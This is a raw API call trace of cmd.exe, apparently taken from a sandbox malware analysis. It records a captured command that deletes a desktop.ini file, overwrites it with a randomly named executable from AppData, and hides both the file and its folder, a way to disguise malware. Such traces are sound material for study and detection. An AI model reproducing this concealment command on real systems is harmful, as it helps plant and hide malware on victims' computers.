(_FileHandle=1) returned 0x7 [0119.427] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0119.427] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.427] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac 
| out: lpMode=0x4a9e41ac) returned 1 [0119.427] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.427] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.427] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.427] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0119.428] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.428] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0119.428] GetEnvironmentStringsW () returned 0x2204e8* [0119.428] FreeEnvironmentStringsW (penv=0x2204e8) returned 1 [0119.428] GetEnvironmentStringsW () returned 0x2204e8* [0119.428] FreeEnvironmentStringsW (penv=0x2204e8) returned 1 [0119.428] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e804 | out: phkResult=0x12e804*=0x40) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x98, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x4) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x0, lpcbData=0x12e808*=0x4) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | 
out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x4) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x4) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.428] RegCloseKey (hKey=0x40) returned 0x0 [0119.428] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e804 | out: phkResult=0x12e804*=0x40) returned 0x0 [0119.428] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x40, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x4) returned 0x0 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x1, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x0, lpcbData=0x12e808*=0x4) returned 0x0 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x4) 
returned 0x0 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x4, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x4) returned 0x0 [0119.429] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e80c, lpData=0x12e810, lpcbData=0x12e808*=0x1000 | out: lpType=0x12e80c*=0x0, lpData=0x12e810*=0x9, lpcbData=0x12e808*=0x1000) returned 0x2 [0119.429] RegCloseKey (hKey=0x40) returned 0x0 [0119.429] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635f [0119.429] srand (_Seed=0x5b88635f) [0119.429] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"" [0119.429] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"" [0119.429] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.429] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x221c48, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0119.429] 
GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.429] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.430] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.430] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0119.430] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0119.430] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0119.430] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0119.430] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0119.430] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0119.430] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0119.430] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0119.430] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0119.430] GetEnvironmentStringsW () returned 0x222638* [0119.430] FreeEnvironmentStringsW (penv=0x222638) returned 1 [0119.430] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.430] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.430] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0119.430] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0119.430] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0119.430] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0119.430] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0119.430] _wcsicmp (_String1="KEYS", _String2="TIME") 
returned -9 [0119.430] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0119.430] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0119.430] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f5d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.430] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f5d0, lpFilePart=0x12f5cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f5cc*="Desktop") returned 0x18 [0119.430] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0119.431] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x220cc8 [0119.431] FindClose (in: hFindFile=0x220cc8 | out: hFindFile=0x220cc8) returned 1 [0119.431] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x220cc8 [0119.431] FindClose (in: hFindFile=0x220cc8 | out: hFindFile=0x220cc8) returned 1 [0119.431] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x220cc8 [0119.431] FindClose (in: hFindFile=0x220cc8 | out: hFindFile=0x220cc8) returned 1 [0119.431] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0119.431] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0119.431] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0119.431] GetEnvironmentStringsW () returned 0x2204e8* [0119.432] FreeEnvironmentStringsW (penv=0x2204e8) returned 1 [0119.432] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.432] GetConsoleOutputCP () returned 0x1b5 [0119.432] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.432] GetUserDefaultLCID () returned 0x409 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f710, cchData=128 | out: lpLCData="0") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f710, cchData=128 | out: lpLCData="0") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f710, cchData=128 | out: lpLCData="1") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0119.433] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0119.433] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0119.434] GetConsoleTitleW (in: lpConsoleTitle=0x210af8, 
nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.434] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0119.434] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0119.434] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0119.434] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0119.435] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0119.435] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0119.435] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0119.435] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0119.435] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0119.435] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0119.435] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0119.437] _wcsicmp (_String1="del", _String2=")") returned 59 [0119.437] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0119.437] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0119.437] _wcsicmp (_String1="IF", _String2="del") returned 5 [0119.437] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0119.437] _wcsicmp (_String1="REM", _String2="del") returned 14 [0119.437] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0119.439] _wcsicmp (_String1="type", _String2=")") returned 75 [0119.439] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0119.439] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0119.439] _wcsicmp (_String1="IF", _String2="type") returned -11 [0119.439] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0119.439] _wcsicmp (_String1="REM", _String2="type") returned -2 [0119.439] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0119.443] SetErrorMode (uMode=0x0) returned 0x0 [0119.443] SetErrorMode (uMode=0x1) returned 0x0 [0119.443] GetFullPathNameW (in: lpFileName=".", 
nBufferLength=0x208, lpBuffer=0x2204f0, lpFilePart=0x12eec4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12eec4*="Desktop") returned 0x18 [0119.443] SetErrorMode (uMode=0x0) returned 0x1 [0119.443] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.443] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.448] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec40) returned 0xffffffff [0119.448] GetLastError () returned 0x2 [0119.448] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec40) returned 0xffffffff [0119.448] GetLastError () returned 0x2 [0119.448] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec40) returned 0x2225d8 [0119.448] FindClose (in: hFindFile=0x2225d8 | out: hFindFile=0x2225d8) returned 1 [0119.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec40) returned 0xffffffff [0119.449] GetLastError () returned 0x2 [0119.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12ec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 
| out: lpFindFileData=0x12ec40) returned 0x2225d8 [0119.449] FindClose (in: hFindFile=0x2225d8 | out: hFindFile=0x2225d8) returned 1 [0119.449] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.449] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.449] GetConsoleTitleW (in: lpConsoleTitle=0x12f138, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.521] InitializeProcThreadAttributeList (in: lpAttributeList=0x12efc0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f088 | out: lpAttributeList=0x12efc0, lpSize=0x12f088) returned 1 [0119.521] UpdateProcThreadAttribute (in: lpAttributeList=0x12efc0, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f080, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12efc0, lpPreviousValue=0x0) returned 1 [0119.521] GetStartupInfoW (in: lpStartupInfo=0x12ef7c | out: lpStartupInfo=0x12ef7c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0119.521] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.522] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f01c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, 
hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f068 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" ", lpProcessInformation=0x12f068*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf64, dwThreadId=0xf68)) returned 1 [0119.529] CloseHandle (hObject=0x4c) returned 1 [0119.529] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.529] GetEnvironmentStringsW () returned 0x220a18* [0119.529] FreeEnvironmentStringsW (penv=0x220a18) returned 1 [0119.529] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0119.812] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12ef5c | out: lpExitCode=0x12ef5c*=0x0) returned 1 [0119.812] CloseHandle (hObject=0x50) returned 1 [0119.812] _vsnwprintf (in: _Buffer=0x12f0a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ef68 | out: _Buffer="00000000") returned 8 [0119.812] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0119.812] GetEnvironmentStringsW () returned 0x222628* [0119.812] FreeEnvironmentStringsW (penv=0x222628) returned 1 [0119.812] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0119.813] GetEnvironmentStringsW () returned 0x222628* [0119.813] FreeEnvironmentStringsW (penv=0x222628) returned 1 [0119.813] DeleteProcThreadAttributeList (in: lpAttributeList=0x12efc0 | out: lpAttributeList=0x12efc0) [0119.813] GetConsoleTitleW (in: lpConsoleTitle=0x12f340, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.813] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e3b8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12e3bc, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e3b8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0119.813] 
_wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0119.814] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0119.814] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0119.814] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1\\desktop.ini")) returned 0xffffffff [0119.814] GetLastError () returned 0x2 [0119.814] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1")) returned 0x2010 [0119.814] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0119.814] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0119.814] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1\\desktop.ini")) returned 0xffffffff [0119.814] GetLastError () returned 0x2 [0119.814] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x2236b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2236b4) returned 0xffffffff [0119.814] GetLastError () returned 0x2 [0119.815] _get_osfhandle (_FileHandle=2) returned 0xb [0119.815] GetFileType (hFile=0xb) returned 0x2 [0119.815] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0119.815] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12edb8 | out: lpMode=0x12edb8) returned 1 [0119.815] _get_osfhandle (_FileHandle=2) returned 0xb [0119.815] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12edec | out: lpConsoleScreenBufferInfo=0x12edec) returned 1 [0119.815] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0119.816] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0119.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.816] GetFileType (hFile=0x7) returned 0x2 [0119.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0119.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f4dc | out: lpMode=0x12f4dc) returned 1 [0119.816] _dup (_FileHandle=1) returned 3 [0119.817] _close (_FileHandle=1) returned 0 [0119.817] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini", _String2="con") returned -53 [0119.817] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f4ac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0119.819] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0119.819] GetConsoleTitleW (in: lpConsoleTitle=0x12f2dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.819] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x12ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ee40) returned 0x21e6b8 [0119.819] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0119.819] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0119.820] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0119.820] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12dd4c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x58 [0119.820] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0119.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.820] GetFileType (hFile=0x58) returned 0x1 [0119.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.820] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x12dda4 | out: lpFileSizeHigh=0x12dda4*=0x0) returned 0x7d600 [0119.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.820] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.820] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 